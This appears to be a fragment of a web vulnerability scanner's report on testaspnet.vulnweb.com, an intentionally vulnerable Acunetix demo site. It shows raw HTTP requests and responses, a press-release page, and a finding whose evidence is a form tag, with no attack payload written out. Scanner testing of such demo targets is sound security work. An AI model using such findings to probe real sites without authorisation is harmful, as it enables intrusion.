%2FAICivnH%2FAICivn7kwoCivn7kwoCivnvtgMCivnvtgMCivmDzQwCivmDzQwCivm34AUCivm34AUCivmrhw0Civmrhw0Civmf7AsCivmf7AsCivmzgwMCivmzgwMCv5P%2FxAkCv5P%2FxAkCv5OTmwECv5OTmwECv5OHvgoCv5OHvgoCv5O71QMCv5O71QMCv5Ov6AwCv5Ov6AwCv5PDjAQCv5PDjAQCv5P3ow0Cv5P3ow0Cv5PrxgYCv5PrxgYCv5PfrwMCv5PfrwMCv5PzwgwCv5PzwgwCkLrd6w8CkLrd6w8CkLrxjgcCkLrxjgcCkLrlJQKQuuUlApC6mfgJApC6mfgJApC6jZ8BApC6jZ8BApC6obIKApC6obIKApC61dYDApC61dYDApC6ye0MApC6ye0MApC6vdUJApC6vdUJApC60ekCApC60ekCAtfZkJ4HAtfZkJ4HAtfZhDUC19mENQLX2bjICQLX2bjICQLX2azvAgLX2azvAgLX2cCDCgLX2cCDCgLX2fSmAwLX2fSmAwLX2ej9DALX2ej9DALX2ZyQBALX2ZyQBAoC8%2BYwLqXVDFYA1YYr1Hu6oI9o
Response Header - size: 222 bytes.	HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/8.5 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 04:41:16 GMT Content-Length: 22936
Response Body - size: 22,936 bytes.	<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" > <HTML> <HEAD> <title>ReadNews</title> <meta content="Microsoft Visual Studio .NET 7.1" name="GENERATOR"> <meta content="C#" name="CODE_LANGUAGE"> <meta content="JavaScript" name="vs_defaultClientScript"> <meta content="http://schemas.microsoft.com/intellisense/ie5" name="vs_targetSchema"> <LINK href="styles.css" type="text/css" rel="stylesheet"> </HEAD> <body> <form name="Form1" method="post" action="ReadNews.aspx?NewsAd=ads%2fdef.html&id=0" id="Form1"> <div> <input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" /> <input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" /> <input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUKLTM1MjIzMjU2OQ9kFgICAQ9kFgwCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgMPFgIfAQVJcG9zdGVkIGJ5IDxzdHJvbmc+YWRtaW4gICAgICAgICAgICAgICAgICAgIDwvc3Ryb25nPjUvMTYvMjAxOSAxMjozMjozMCBQTWQCBQ8WAh8BBT5BY3VuZXRpeCBWdWxuZXJhYmlsaXR5IFNjYW5uZXIgTm93IFdpdGggTmV0d29yayBTZWN1cml0eSBTY2Fuc2QCBw8WAh8BBbMePHA+PHN0cm9uZz5Mb25kb24sIFVLPC9zdHJvbmc+ICZuZGFzaDsgPHN0cm9uZz5NYXkgMjAxOTwvc3Ryb25nPiAmbmRhc2g7IEFjdW5ldGl4LCB0aGUgcGlvbmVlciBpbiBhdXRvbWF0ZWQgd2ViIGFwcGxpY2F0aW9uIHNlY3VyaXR5IHNvZnR3YXJlLCBoYXMgYW5ub3VuY2VkIHRoYXQgYWxsIHZlcnNpb25zIG9mIHRoZSA8YSBocmVmPWh0dHBzOi8vd3d3LmFjdW5ldGl4LmNvbS92dWxuZXJhYmlsaXR5LXNjYW5uZXIvPkFjdW5ldGl4IFZ1bG5lcmFiaWxpdHkgU2Nhbm5lcjwvYT4gbm93IHN1cHBvcnQgPGEgaHJlZj1odHRwczovL3d3dy5hY3VuZXRpeC5jb20vdnVsbmVyYWJpbGl0eS1zY2FubmVyL25ldHdvcmstc2VjdXJpdHktc2Nhbm5lci8+bmV0d29yayBzZWN1cml0eSBzY2FubmluZzwvYT4uIE5ldHdvcmsgc2VjdXJpdHkgc2NhbnMgYXJlIHBvc3NpYmxlIHRoYW5rcyB0byB0aGUgc2VhbWxlc3MgaW50ZWdyYXRpb24gb2YgQWN1bmV0aXggd2l0aCB0aGUgcG93ZXJmdWwgT3BlblZBUyBzZWN1cml0eSBzb2x1dGlvbi4gVW50aWwgbm93LCBuZXR3b3JrIHNlY3VyaXR5IHNjYW5uaW5nIGZ1bmN0aW9uYWxpdHkgd2FzIGF2YWlsYWJsZSBvbmx5IGluIEFjdW5ldGl4IE9ubGluZS48L3A+ICAgICA8cD4mbGRxdW87Tm8gbWF0dGVyIHRoZSBzaXplIG9mIHlvdXIgYnVzaW5lc3MsIHlvdSB1c2UgbXVsdGlwbGUgc2VjdXJpdHkgbWVhc3VyZXMgdG8gYWxsZXZpYXRlIGRpZmZlcmVudCB0eXBlcyBvZiByaXNrcy4gWW91ciBzZWN1cml0eSBzdHJhdGVneSBtdXN0IGFsd2F5cyBpbmNsdWRlIGJvdGggd2ViIHNlY3VyaXR5IHNjYW5zIGFuZCBuZXR3b3JrIHNlY3VyaXR5IHNjYW5zLiBBbmQgaXQgbWFrZXMgaXQgc28gbXVjaCBlYXNpZXIgYW5kIG11Y2ggbW9yZSBlZmZpY2llbnQgaWYgeW91IGNhbiBkbyB0aGUgdHdvIHRvZ2V0aGVyIHVzaW5nIGEgc2luZ2xlIGludGVncmF0ZWQgdG9vbCwmcmRxdW87IHNhaWQgTmljb2xhcyBTY2liZXJyYXMsIENUTy48L3A+ICAgICA8cD5UaGVyZSBhcmUgbWFueSBhZHZhbnRhZ2VzIG9mIHJ1bm5pbmcgbmV0d29yayBzZWN1cml0eSBzY2FucyBpbiBBY3VuZXRpeC4gSGF2aW5nIGEgc2luZ2xlIGludGVncmF0ZWQgZGFzaGJvYXJkIHdpdGggYm90aCB3ZWIgYW5kIG5ldHdvcmsgdnVsbmVyYWJpbGl0aWVzIGdpdmVzIHRoZSBiZXN0IHBvc3NpYmxlIHJpc2sgdmlzaWJpbGl0eSBhbmQgc2F2ZXMgYSBsb3Qgb2YgdGltZSBhbmQgZWZmb3J0LiBOZXR3b3JrIHNjYW5zIG1heSBhbHNvIGJlbmVmaXQgZnJvbSBvdGhlciBBY3VuZXRpeCBmZWF0dXJlcywgc3VjaCBhcyA8YSBocmVmPWh0dHBzOi8vd3d3LmFjdW5ldGl4LmNvbS92dWxuZXJhYmlsaXR5LXNjYW5uZXIvYWN1bmV0aXgtaW50ZWdyYXRpb25zLz5pc3N1ZSB0cmFja2VyIGludGVncmF0aW9uPC9hPiBhbmQgPGEgaHJlZj1odHRwczovL3d3dy5hY3VuZXRpeC5jb20vdnVsbmVyYWJpbGl0eS1zY2FubmVyL3Z1bG5lcmFiaWxpdHktbWFuYWdlbWVudC1yZWd1bGF0b3J5LWNvbXBsaWFuY2UvPmNvbXByZWhlbnNpdmUgcmVwb3J0aW5nPC9hPi48L3A+ICAgICA8cD48c3Ryb25nPk1vcmUgRmVhdHVyZXMgaW4gdGhlIExhdGVzdCBCdWlsZDwvc3Ryb25nPjwvcD4gICAgIDxwPk9wZW5WQVMgaW50ZWdyYXRpb24gaXMgaW50cm9kdWNlZCBhcyBwYXJ0IG9mIHRoZSBsYXRlc3QgQWN1bmV0aXggdmVyc2lvbiAxMiBidWlsZCAoPGEgaHJlZj1odHRwczovL3d3dy5hY3VuZXRpeC5jb20vYmxvZy9yZWxlYXNlcy9uZXctYnVpbGQtbmV0d29yay1zY2FubmluZy1pbnRlZ3JhdGlvbi1pcHY2LXN1cHBvcnQvPmJ1aWxkIDEyLjAuMTkwNTE1MTQ5PC9hPikuIFRoaXMgbmV3IGJ1aWxkIGFsc28gaW5jbHVkZXM6PC9wPiAgICAgPHA+LSBTdXBwb3J0IGZvciBJUHY2PGJyIC8+ICAgICAtIEltcHJvdmVkIHVzYWdlIG9mIG1hY2hpbmUgcmVzb3VyY2VzPGJyIC8+ICAgICAtIEFkZGVkIHN1cHBvcnQgZm9yIFNlbGVuaXVtIHNjcmlwdHMgYXMgaW1wb3J0IGZpbGVzPGJyIC8+ICAgICAtIE11bHRpcGxlIHZ1bG5lcmFiaWxpdHkgY2hlY2tzIGZvciBTQVA8YnIgLz4gICAgIC0gVW5hdXRob3JpemVkIGFjY2VzcyBkZXRlY3Rpb24gZm9yIFJlZGlzIGFuZCBNZW1jYWNoZWQ8YnIgLz4gICAgIC0gU291cmNlIGNvZGUgZGlzY2xvc3VyZSBmb3IgUnVieSBhbmQgUHl0aG9uPC9wPiAgICAgPHA+VGhlIG5ldyBidWlsZCBhbHNvIGluY2x1ZGVzIGEgbnVtYmVyIG9mIHVwZGF0ZXMgYW5kIGZpeGVzLCBhbGwgb2Ygd2hpY2ggYXJlIGF2YWlsYWJsZSBmb3IgYm90aCBXaW5kb3dzIGFuZCBMaW51eC4gTW9yZSBpbmZvcm1hdGlvbiBjYW4gYmUgZm91bmQgPGEgaHJlZj1odHRwczovL3d3dy5hY3VuZXRpeC5jb20vYmxvZy9yZWxlYXNlcy9uZXctYnVpbGQtbmV0d29yay1zY2FubmluZy1pbnRlZ3JhdGlvbi1pcHY2LXN1cHBvcnQvPmhlcmU8L2E+LjwvcD4gICAgIDxwPkdldCBhIGRlbW8gb2YgdGhlIHByb2R1Y3QgPGEgaHJlZj1odHRwczovL3d3dy5hY3VuZXRpeC5jb20vbmV0d29yay1zZWN1cml0eS1zY2FubmVyLz5oZXJlPC9hPi48L3A+ICAgICA8cD48c3Ryb25nPkFib3V0IEFjdW5ldGl4PC9zdHJvbmc+PC9wPiAgICAgPHA+VXNlci1mcmllbmRseSBhbmQgY29tcGV0aXRpdmVseSBwcmljZWQsIEFjdW5ldGl4IGxlYWRzIHRoZSBtYXJrZXQgaW4gYXV0b21hdGljIHdlYiBzZWN1cml0eSB0ZXN0aW5nIHRlY2hub2xvZ3kuIEl0cyBpbmR1c3RyeS1sZWFkaW5nIGNyYXdsZXIgZnVsbHkgc3VwcG9ydHMgSFRNTDUsIEphdmFTY3JpcHQsIGFuZCBBSkFYLWhlYXZ5IHdlYnNpdGVzLCBlbmFibGluZyB0aGUgYXVkaXRpbmcgb2YgY29tcGxleCwgYXV0aGVudGljYXRlZCBhcHBsaWNhdGlvbnMuIEFjdW5ldGl4IHByb3ZpZGVzIHRoZSBvbmx5IHRlY2hub2xvZ3kgb24gdGhlIG1hcmtldCB0aGF0IGNhbiBhdXRvbWF0aWNhbGx5IGRldGVjdCBvdXQtb2YtYmFuZCB2dWxuZXJhYmlsaXRpZXMgYW5kIGlzIGF2YWlsYWJsZSBib3RoIGFzIGFuIG9ubGluZSBhbmQgb24tcHJlbWlzZXMgc29sdXRpb24uIEFjdW5ldGl4IGFsc28gaW5jbHVkZXMgaW50ZWdyYXRlZCB2dWxuZXJhYmlsaXR5IG1hbmFnZW1lbnQgZmVhdHVyZXMgdG8gZXh0ZW5kIHRoZSBlbnRlcnByaXNlJnJzcXVvO3MgYWJpbGl0eSB0byBjb21wcmVoZW5zaXZlbHkgbWFuYWdlLCBwcmlvcml0aXplLCBhbmQgY29udHJvbCB2dWxuZXJhYmlsaXR5IHRocmVhdHMgJm5kYXNoOyBvcmRlcmVkIGJ5IGJ1c2luZXNzIGNyaXRpY2FsaXR5LjwvcD4gICAgIDxwPjxzdHJvbmc+QWN1bmV0aXgsIHRoZSBDb21wYW55PC9zdHJvbmc+PC9wPiAgICAgPHA+Rm91bmRlZCBpbiAyMDA0IHRvIGNvbWJhdCB0aGUgYWxhcm1pbmcgcmlzZSBpbiB3ZWIgYXBwbGljYXRpb24gYXR0YWNrcywgQWN1bmV0aXggaXMgdGhlIG1hcmtldCBsZWFkZXIgYW5kIGEgcGlvbmVlciBpbiBhdXRvbWF0ZWQgd2ViIGFwcGxpY2F0aW9uIHNlY3VyaXR5IHRlY2hub2xvZ3kuIEZyb20gaW5kaXZpZHVhbCBjb25zdWx0YW50cyB0byBlbnRlcnByaXNlcywgcGVuZXRyYXRpb24gdGVzdGVycyBhbmQgc2VjdXJpdHkgZXhwZXJ0cyBnbG9iYWxseSBkZXBlbmQgb24gQWN1bmV0aXggcHJvZHVjdHMgYW5kIHRlY2hub2xvZ2llcy4gSXQgaXMgdGhlIHRvb2wgb2YgY2hvaWNlIGZvciBtYW55IGN1c3RvbWVycyBhY3Jvc3Mgc2VjdG9ycywgaW5jbHVkaW5nIEdvdmVybm1lbnQsIE1pbGl0YXJ5LCBFZHVjYXRpb24sIFRlbGVjb21tdW5pY2F0aW9ucywgQmFua2luZywgRmluYW5jZSwgYW5kIEUtQ29tbWVyY2Ugc2VjdG9ycyBhcyB3ZWxsIGFzIG1hbnkgRm9ydHVuZSA1MDAgY29tcGFuaWVzIHN1Y2ggYXMgdGhlIFBlbnRhZ29uLCBIYXJwZXIgQ29sbGlucywgRGlzbmV5LCBBZG9iZSwgYW5kIG1hbnkgbW9yZS48L3A+ZAIJDw8WBB4EVGV4dAUSUmVhZCB1c2VyIGNvbW1lbnRzHgtOYXZpZ2F0ZVVybAUSQ29tbWVudHMuYXNweD9pZD0wZGQCCw8WAh4Dc3JjBQxhZHMvZGVmLmh0bWxkZKl3HbqwkCOjuj45XaEhgnLsklpZ" /> </div> <script type="text/javascript"> //<![CDATA[ var theForm = document.forms['Form1']; if (!theForm) { theForm = document.Form1; } function __doPostBack(eventTarget, eventArgument) { if (!theForm.onsubmit \|\| (theForm.onsubmit() != false)) { theForm.__EVENTTARGET.value = eventTarget; theForm.__EVENTARGUMENT.value = eventArgument; theForm.submit(); } } //]]> </script> <div> <input type="hidden" name="__VIEWSTATEGENERATOR" id="__VIEWSTATEGENERATOR" value="532053C5" /> <input type="hidden" name="__EVENTVALIDATION" id="__EVENTVALIDATION" value="/wEWVwLH7tLMBwL+kPzjAQLQp5LlBAKx0tH6DwKx0tH6DwKx0sWRBwKx0sWRBwKx0rn5BQKx0rn5BQKx0q2cDQKx0q2cDQKK+b8FAor5vwUCivnT2QkCivnT2QkCivnH/AICivnH/AICivn7kwoCivn7kwoCivnvtgMCivnvtgMCivmDzQwCivmDzQwCivm34AUCivm34AUCivmrhw0Civmrhw0Civmf7AsCivmf7AsCivmzgwMCivmzgwMCv5P/xAkCv5P/xAkCv5OTmwECv5OTmwECv5OHvgoCv5OHvgoCv5O71QMCv5O71QMCv5Ov6AwCv5Ov6AwCv5PDjAQCv5PDjAQCv5P3ow0Cv5P3ow0Cv5PrxgYCv5PrxgYCv5PfrwMCv5PfrwMCv5PzwgwCv5PzwgwCkLrd6w8CkLrd6w8CkLrxjgcCkLrxjgcCkLrlJQKQuuUlApC6mfgJApC6mfgJApC6jZ8BApC6jZ8BApC6obIKApC6obIKApC61dYDApC61dYDApC6ye0MApC6ye0MApC6vdUJApC6vdUJApC60ekCApC60ekCAtfZkJ4HAtfZkJ4HAtfZhDUC19mENQLX2bjICQLX2bjICQLX2azvAgLX2azvAgLX2cCDCgLX2cCDCgLX2fSmAwLX2fSmAwLX2ej9DALX2ej9DALX2ZyQBALX2ZyQBNBPxOo+suXOQO2cYqA7NT0P30nF" /> </div> <TABLE id="Table1" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD style="COLOR: #e6dccf" bgColor="#806640" height="75"><a href="https://www.acunetix.com/"><IMG src="images/logo_acunetix.gif" align="absMiddle" border="0" alt="Acunetix website security"></a></TD> <TD style="FONT-WEIGHT: bold; FONT-SIZE: small; COLOR: #e6dccf" align="right" bgColor="#806640" height="75">Test Website for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></TD> </TR> </TABLE> <TABLE id="Table2" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD class="MenuBar" style="BORDER-LEFT: #806040 1px solid"><A class="menu" title="About" href="about.aspx">about</A> <A class="menu" title="Latest news" href="default.aspx">news</A> <a href="login.aspx" id="MainMenu1_lnkLog" class="menu" name="lnkLog">login</a> <a href="Signup.aspx" id="MainMenu1_lnkSignup" class="menu" name="lnkSignup"> signup</a> <A class="menu" title="Network scanner" href="https://www.acunetix.com/vulnerability-scanner/network-vulnerability-scanner/">network scanner</A> <A class="menu" title="Network vuln help" href="https://www.acunetix.com/blog/articles/network-vulnerability-assessment-gotchas-avoid/">network vuln help</A> </TD> <td class="MenuBar" align="right" width="50px"> <A href="rssFeed.aspx"><IMG src="images/rss.gif" border="0"></A> </td> </TR> </TABLE> <TABLE id="Table1" cellSpacing="0" cellPadding="10" width="790" align="center" border="0"> <TR> <TD vAlign="top"> <DIV id="divNewsDate" class="NewsDate">posted by <strong>admin </strong>5/16/2019 12:32:30 PM</DIV> <DIV id="divNewsTitle" class="NewsTitle">Acunetix Vulnerability Scanner Now With Network Security Scans</DIV> <DIV id="divNewsLong" class="NewsLong"><p><strong>London, UK</strong> – <strong>May 2019</strong> – Acunetix, the pioneer in automated web application security software, has announced that all versions of the <a href=https://www.acunetix.com/vulnerability-scanner/>Acunetix Vulnerability Scanner</a> now support <a href=https://www.acunetix.com/vulnerability-scanner/network-security-scanner/>network security scanning</a>. Network security scans are possible thanks to the seamless integration of Acunetix with the powerful OpenVAS security solution. Until now, network security scanning functionality was available only in Acunetix Online.</p> <p>“No matter the size of your business, you use multiple security measures to alleviate different types of risks. Your security strategy must always include both web security scans and network security scans. And it makes it so much easier and much more efficient if you can do the two together using a single integrated tool,” said Nicolas Sciberras, CTO.</p> <p>There are many advantages of running network security scans in Acunetix. Having a single integrated dashboard with both web and network vulnerabilities gives the best possible risk visibility and saves a lot of time and effort. Network scans may also benefit from other Acunetix features, such as <a href=https://www.acunetix.com/vulnerability-scanner/acunetix-integrations/>issue tracker integration</a> and <a href=https://www.acunetix.com/vulnerability-scanner/vulnerability-management-regulatory-compliance/>comprehensive reporting</a>.</p> <p><strong>More Features in the Latest Build</strong></p> <p>OpenVAS integration is introduced as part of the latest Acunetix version 12 build (<a href=https://www.acunetix.com/blog/releases/new-build-network-scanning-integration-ipv6-support/>build 12.0.190515149</a>). This new build also includes:</p> <p>- Support for IPv6<br /> - Improved usage of machine resources<br /> - Added support for Selenium scripts as import files<br /> - Multiple vulnerability checks for SAP<br /> - Unauthorized access detection for Redis and Memcached<br /> - Source code disclosure for Ruby and Python</p> <p>The new build also includes a number of updates and fixes, all of which are available for both Windows and Linux. More information can be found <a href=https://www.acunetix.com/blog/releases/new-build-network-scanning-integration-ipv6-support/>here</a>.</p> <p>Get a demo of the product <a href=https://www.acunetix.com/network-security-scanner/>here</a>.</p> <p><strong>About Acunetix</strong></p> <p>User-friendly and competitively priced, Acunetix leads the market in automatic web security testing technology. Its industry-leading crawler fully supports HTML5, JavaScript, and AJAX-heavy websites, enabling the auditing of complex, authenticated applications. Acunetix provides the only technology on the market that can automatically detect out-of-band vulnerabilities and is available both as an online and on-premises solution. Acunetix also includes integrated vulnerability management features to extend the enterprise’s ability to comprehensively manage, prioritize, and control vulnerability threats – ordered by business criticality.</p> <p><strong>Acunetix, the Company</strong></p> <p>Founded in 2004 to combat the alarming rise in web application attacks, Acunetix is the market leader and a pioneer in automated web application security technology. From individual consultants to enterprises, penetration testers and security experts globally depend on Acunetix products and technologies. It is the tool of choice for many customers across sectors, including Government, Military, Education, Telecommunications, Banking, Finance, and E-Commerce sectors as well as many Fortune 500 companies such as the Pentagon, Harper Collins, Disney, Adobe, and many more.</p></DIV> <TABLE id="Table2" cellSpacing="0" cellPadding="0" width="500" border="0"> <TR> <TD vAlign="bottom"><IMG src="images/comment-before.gif"></TD> </TR> <TR> <TD class="Comment" vAlign="middle"> <a id="hlComments" href="Comments.aspx?id=0">Read user comments</a></TD> </TR> <TR> <TD vAlign="top"><IMG src="images/comment-after.gif"></TD> </TR> </TABLE> <center> <iframe id="adsFrame" src="ads/def.html" width="200" height="110" style="BORDER-RIGHT: lemonchiffon 1px solid; BORDER-TOP: lemonchiffon 1px solid; BORDER-LEFT: lemonchiffon 1px solid; BORDER-BOTTOM: lemonchiffon 1px solid" frameBorder="no" scrolling="no"></iframe> </center> </TD> <TD vAlign="top" width="200" colSpan="2"> <table id="RightPanel1_Calendar" class="Calendar" cellspacing="0" cellpadding="1" title="Calendar" border="0" style="background-color:#E6DCCF;border-width:1px;border-style:Solid;font-size:X-Small;border-collapse:collapse;"> <tr><td colspan="7" style="background-color:#E6B873;"><table class="Calendar" cellspacing="0" border="0" style="font-size:X-Small;font-weight:bold;width:100%;border-collapse:collapse;"> <tr><td style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8340')" style="color:Black" title="Go to the previous month"><</a></td><td align="center" style="width:70%;">December 2022</td><td align="right" style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8401')" style="color:Black" title="Go to the next month">></a></td></tr> </table></td></tr><tr><th align="center" abbr="Sunday" scope="col">Sun</th><th align="center" abbr="Monday" scope="col">Mon</th><th align="center" abbr="Tuesday" scope="col">Tue</th><th align="center" abbr="Wednesday" scope="col">Wed</th><th align="center" abbr="Thursday" scope="col">Thu</th><th align="center" abbr="Friday" scope="col">Fri</th><th align="center" abbr="Saturday" scope="col">Sat</th></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8366')" style="color:Black" title="November 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8367')" style="color:Black" title="November 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8368')" style="color:Black" title="November 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8369')" style="color:Black" title="November 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8370')" style="color:Black" title="December 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8371')" style="color:Black" title="December 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8372')" style="color:Black" title="December 03">3</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8373')" style="color:Black" title="December 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8374')" style="color:Black" title="December 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8375')" style="color:Black" title="December 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8376')" style="color:Black" title="December 07">7</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8377')" style="color:Black" title="December 08">8</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8378')" style="color:Black" title="December 09">9</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8379')" style="color:Black" title="December 10">10</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8380')" style="color:Black" title="December 11">11</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8381')" style="color:Black" title="December 12">12</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8382')" style="color:Black" title="December 13">13</a></td><td align="center" style="border-color:#806640;width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8383')" style="color:Black" title="December 14">14</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8384')" style="color:Black" title="December 15">15</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8385')" style="color:Black" title="December 16">16</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8386')" style="color:Black" title="December 17">17</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8387')" style="color:Black" title="December 18">18</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8388')" style="color:Black" title="December 19">19</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8389')" style="color:Black" title="December 20">20</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8390')" style="color:Black" title="December 21">21</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8391')" style="color:Black" title="December 22">22</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8392')" style="color:Black" title="December 23">23</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8393')" style="color:Black" title="December 24">24</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8394')" style="color:Black" title="December 25">25</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8395')" style="color:Black" title="December 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8396')" style="color:Black" title="December 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8397')" style="color:Black" title="December 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8398')" style="color:Black" title="December 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8399')" style="color:Black" title="December 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8400')" style="color:Black" title="December 31">31</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8401')" style="color:Black" title="January 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8402')" style="color:Black" title="January 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8403')" style="color:Black" title="January 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8404')" style="color:Black" title="January 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8405')" style="color:Black" title="January 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8406')" style="color:Black" title="January 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8407')" style="color:Black" title="January 07">7</a></td></tr> </table><BR> <a href="rssFeed.aspx">Get RSS feed</a> </TD> </TR> <TR> <TD colSpan="3"></TD> </TR> </TABLE> </form> </body> <div style="background-color:lightgray;width:40%;margin:auto;left:30%;position:fixed;bottom:2px;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:5%;padding-right:5%"><b>Warning</b>: This is not a blog. This is a test site for Acunetix. It is vulnerable to SQL Injections, Cross-site Scripting (XSS), and more. It was built using ASP.NET and it shows how bad programming leads to vulnerabilities. Do not visit the links in the comments. They are posted by malicious parties who are trying to exploit this site to their advantage. Comments are purged daily.</p> </div> </HTML>
URL	http://testaspnet.vulnweb.com/ReadNews.aspx?NewsAd=ads%2fdef.html&id=2
Method	POST
Parameter
Attack
Evidence	<form name="Form1" method="post" action="ReadNews.aspx?NewsAd=ads%2fdef.html&id=2" id="Form1">
Show / hide Request and Response
Request Header - size: 464 bytes.	POST http://testaspnet.vulnweb.com/ReadNews.aspx?NewsAd=ads%2fdef.html&id=2 HTTP/1.1 Host: testaspnet.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Referer: http://testaspnet.vulnweb.com/ReadNews.aspx?NewsAd=ads/def.html&id=2 Content-Length: 10945 Cookie: ASP.NET_SessionId=3qnlyw45qx3ugzagkbwuyse5
Request Body - size: 10,945 bytes.	__EVENTTARGET=&__EVENTARGUMENT=&__VIEWSTATE=%2FwEPDwUKLTM1MjIzMjU2OQ9kFgICAQ9kFgwCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgMPFgIfAQVJcG9zdGVkIGJ5IDxzdHJvbmc%2BYWRtaW4gICAgICAgICAgICAgICAgICAgIDwvc3Ryb25nPjExLzgvMjAwNSAxMTozNToyMiBBTWQCBQ8WAh8BBTxXZWIgYXR0YWNrcyAtIGNhbiB5b3VyIHdlYiBhcHBsaWNhdGlvbnMgd2l0aHN0YW5kIHRoZSBmb3JjZT9kAgcPFgIfAQWbODxwPjxzdHJvbmc%2BQWN1bmV0aXggY29tYmF0cyByaXNlIGluIHdlYiBhdHRhY2tzIHdpdGggQWN1bmV0aXggICAgICAgICAgICAgICAgICAgICAgICAgICAgV2ViIFZ1bG5lcmFiaWxpdHkgU2Nhbm5lciAyIDwvc3Ryb25nPjwvcD4gICAgICAgICAgICAgICAgICAgICAgICAgICA8cD4yMSBKdWx5IDIwMDUgLSA8c3Ryb25nPlN0YXJ0LXVwIGNvbXBhbnkgQWN1bmV0aXggcmVsZWFzZWQgICAgICAgICAgICAgICAgICAgICAgICAgICAgQWN1bmV0aXggV2ViIFZ1bG5lcmFiaWxpdHkgU2Nhbm5lcjogYSB0b29sIHRvIGF1dG9tYXRpY2FsbHkgICAgICAgICAgICAgICAgICAgICAgICAgICAgYXVkaXQgd2Vic2l0ZSBzZWN1cml0eS4gQWN1bmV0aXggV2ViIFZ1bG5lcmFiaWxpdHkgU2Nhbm5lciAgICAgICAgICAgICAgICAgICAgICAgICAgICAyIGNyYXdscyBhbiBlbnRpcmUgd2Vic2l0ZSwgbGF1bmNoZXMgcG9wdWxhciB3ZWIgYXR0YWNrcyAgICAgICAgICAgICAgICAgICAgI